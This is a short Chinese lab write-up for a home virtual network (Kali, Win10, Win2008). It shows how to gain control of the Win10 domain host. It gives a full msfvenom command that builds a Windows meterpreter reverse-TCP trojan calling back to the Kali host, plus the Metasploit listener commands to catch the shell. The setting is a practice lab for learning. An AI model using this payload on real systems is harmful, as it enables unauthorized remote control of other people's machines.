实验环境
网络拓扑:
kali:
- VMnet1(公网)192.168.52.134
win10:
- VMnet1(公网)192.168.52.135
- VMnet2(内网)192.168.72.133
win2008:
- VMnet2(内网) 192.168.72.132
学习参考:https://www.cnblogs.com/cute-puli/p/15510271.html
1. 拿下域内主机win10权限
这里直接msfvenom生成一个反弹shell木马。
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.52.134 LPORT=2333 --platform windows -f exe -o shell.exe
复制到win10,
kali进入msfconsole
user exploit/multi/hanlder
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.52.134
set LPORT 2333
exploit -j
然后win10运行shell.exe就可以上线。